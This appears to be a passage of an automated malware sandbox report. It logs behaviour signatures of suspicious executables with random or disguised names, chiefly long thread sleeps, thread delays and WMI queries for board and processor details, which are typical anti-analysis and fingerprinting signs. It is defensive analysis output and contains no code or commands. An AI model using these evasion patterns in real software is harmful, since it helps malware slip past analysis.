                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59766s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59657s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59532s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59408s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59286s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59157s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -598000s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59860s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59751s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59626s >= -30000sJump to behavior
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe TID: 6388Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5772Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe TID: 3852Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe TID: 4364Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe TID: 1364Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe TID: 4480Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 4040Thread sleep count: 31 > 30
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 4040Thread sleep time: -310000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 5772Thread sleep count: 39 > 30
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 5772Thread sleep time: -390000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeThread delayed: delay time: 60000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 60000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59874Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59750Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59640Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59531Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59422Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59297Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59178Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59047Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 58932Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 180000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 1199988Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59877Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 59754Jump to behavior
